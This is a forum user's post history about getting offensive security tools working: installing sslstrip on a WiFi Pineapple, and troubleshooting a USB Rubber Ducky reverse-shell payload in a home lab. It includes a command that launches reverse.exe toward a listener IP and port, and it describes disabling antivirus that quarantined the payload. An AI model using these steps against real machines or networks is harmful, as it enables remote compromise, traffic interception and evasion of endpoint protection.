Jump to content

BGPv5

Active Members
  • Posts

    9
  • Joined

  • Last visited

Everything posted by BGPv5

  1. After doing the above, looks like some dependency was satisfied. I was able to install via the pineapple bar to my usb. Looks like I have two path for sslstrip now, but hey, its working :)
  2. update - I just scp .ipk to the pineapple and installed. Looks like opkg installed a few deps (python) root@Pineapple:/# opkg install --dest usb /etc/sslstrip_0.7-1_ar71xx.ipk Installing sslstrip (0.7-1) to usb... Installing python (2.7.3-2) to usb... Downloading http://cloud.wifipineapple.com/packages/python_2.7.3-2_ar71xx.ipk. Installing libffi (3.0.11-1) to usb... Downloading http://cloud.wifipineapple.com/packages/libffi_3.0.11-1_ar71xx.ipk. Installing python-mini (2.7.3-2) to usb... Downloading http://cloud.wifipineapple.com/packages/python-mini_2.7.3-2_ar71xx.ipk. Installing twisted (2.5.0-1) to usb... Downloading http://cloud.wifipineapple.com/packages/twisted_2.5.0-1_ar71xx.ipk. Installing zope-interface (2.5.0-1) to usb... Downloading http://cloud.wifipineapple.com/packages/zope-interface_2.5.0-1_ar71xx.ipk. Installing twisted-web (2.5.0-1) to usb... Downloading http://cloud.wifipineapple.com/packages/twisted-web_2.5.0-1_ar71xx.ipk. Installing pyopenssl (0.10-1) to usb... Downloading http://cloud.wifipineapple.com/packages/pyopenssl_0.10-1_ar71xx.ipk. Configuring python-mini. Configuring zope-interface. Configuring twisted. Configuring twisted-web. Configuring libffi. Configuring python. Configuring pyopenssl. Configuring sslstrip. I will see if this worked and report back.
  3. Sorry if I missed the thread, but I did some searching and didnt find the solution to the following error. I am trying to install sslstrip. I had it installed before I re-flashed. Previously I used the gui to install, but since that had a install error, I went to the cli. running firmware 2.8.1 root@Pineapple:~# opkg update Downloading http://cloud.wifipineapple.com/packages/Packages.gz. Updated list of available packages in /var/opkg-lists/pineapple_packages. root@Pineapple:~# opkg install --dest usb sslstrip Installing sslstrip (0.7-1) to usb... Downloading http://cloud.wifipineapple.com/packages/sslstrip_0.7-1_ar71xx.ipk.'>http://cloud.wifipineapple.com/packages/sslstrip_0.7-1_ar71xx.ipk. wget: server returned error: HTTP/1.0 403 Forbidden Collected errors: * opkg_download: Failed to download http://cloud.wifipineapple.com/packages/sslstrip_0.7-1_ar71xx.ipk,'>http://cloud.wifipineapple.com/packages/sslstrip_0.7-1_ar71xx.ipk, wget returned 1. * opkg_install_pkg: Failed to download sslstrip. Perhaps you need to run 'opkg update'? * opkg_install_cmd: Cannot install package sslstrip. Does the same with internal mem... i assume the url is the hint? I was able to download from my server... wget http://cloud.wifipineapple.com/packages/sslstrip_0.7-1_ar71xx.ipk --2013-07-31 11:52:40-- http://cloud.wifipineapple.com/packages/sslstrip_0.7-1_ar71xx.ipk Resolving cloud.wifipineapple.com (cloud.wifipineapple.com)... 206.72.192.42 Connecting to cloud.wifipineapple.com (cloud.wifipineapple.com)|206.72.192.42|:80... connected. HTTP request sent, awaiting response... 301 Moved Permanently Location: http://downloads.openwrt.org/snapshots/trunk/ar71xx/packages/sslstrip_0.7-1_ar71xx.ipk [following] --2013-07-31 11:52:40-- http://downloads.openwrt.org/snapshots/trunk/ar71xx/packages/sslstrip_0.7-1_ar71xx.ipk Resolving downloads.openwrt.org (downloads.openwrt.org)... 78.24.191.177 Connecting to downloads.openwrt.org (downloads.openwrt.org)|78.24.191.177|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 21841 (21K) [application/octet-stream] Saving to: `sslstrip_0.7-1_ar71xx.ipk' 100%[==========================================================================================>] 21,841 --.-K/s in 0.1s 2013-07-31 11:52:42 (148 KB/s) - `sslstrip_0.7-1_ar71xx.ipk' saved [21841/21841] Wondering if I should just scp file over and opkg install? If there is a thread on this, can you please point me there. I can read the steps from there. Thank you !
  4. [sOLVED] 1. No errors gave me a clue something else is preventing it from running, else other would have had the problem. 2. I installed and fired up a Vbox image of XP and Win7 3. Both worked flawlessly 4. Notice my Symantec Endpoint Protection was still running (not in taskbar) on my orig machine *5. Symantec tagged all the files I tried to rename, from reverse.exe to foo.bat as "Suspicious.MLApp" and quarantined. Completely disable it in task manager and wrong as expected now. Hope this helps another noob out there. Thanks for listening :)
  5. I hoped that was the issue also. I deleted them each time I ran it. In addition, I renamed the reverse.exe to other names and extensions to see if that gave a hint. The last option I tried was saving to other directories and\or drives. This was in hopes to get the reverse.exe. I'm guessing, but it seems like cscript is not compiling/creating the executable. Here I just went to a cmd prompt to have script make anything from a removable drive(not the ducky): D:\>dir Volume in drive D has no label. Volume Serial Number is 6662-3931 Directory of D:\ 02/24/2011 01:51 PM <DIR> DCIM 02/24/2011 01:51 PM <DIR> MISC 12/23/2011 07:14 AM 452 decoder.vbs 12/23/2011 07:14 AM 1,732 reverse.txt 2 File(s) 2,184 bytes 2 Dir(s) 7,938,441,216 bytes free D:\>cscript decoder.vbs reverse.txt reverse.exe Microsoft (R) Windows Script Host Version 5.8 Copyright (C) Microsoft Corporation. All rights reserved. D:\>dir Volume in drive D has no label. Volume Serial Number is 6662-3931 Directory of D:\ 02/24/2011 01:51 PM <DIR> DCIM 02/24/2011 01:51 PM <DIR> MISC 12/23/2011 07:14 AM 452 decoder.vbs 12/23/2011 07:14 AM 1,732 reverse.txt 2 File(s) 2,184 bytes 2 Dir(s) 7,938,441,216 bytes free No reverse.exe I also tried the "//D" option to see if I could get some kind of error report, but nothing. Thanks
  6. Hello all, I am now trying to play in my home lab with the reverse shell and running into a slight issue with reverse.exe not being created. I get the following after compilation: 1 file(s) copied. C:\Windows\system32>cscript c:\decoder.vbs c:\reverse.txt c:\reverse.exe Microsoft (R) Windows Script Host Version 5.8 Copyright (C) Microsoft Corporation. All rights reserved. C:\Windows\system32>c:\reverse.exe 192.168.32.190 8080 'c:\reverse.exe' is not recognized as an internal or external command, operable program or batch file. Version of cscript seems to be 5.8 C:\Windows\system32>cscript Microsoft (R) Windows Script Host Version 5.8 Copyright (C) Microsoft Corporation. All rights reserved. Usage: CScript scriptname.extension [option...] [arguments...] The decoder.vbs and reverse.txt are there, but no reverse.exe. I am using the same example from the wiki with the addition of the STRING_DELAY and compiled online. every other aspect appears to work as expected. Can someone give me a pointer (if I missing on the wiki, please just point to the thread and I will follow) If you need more info - let me know.... Kind Regards
  7. @digininga & Leg3nd - This script is awesome work. Thank you for putting the time into this and sharing!!!
×
×
  • Create New...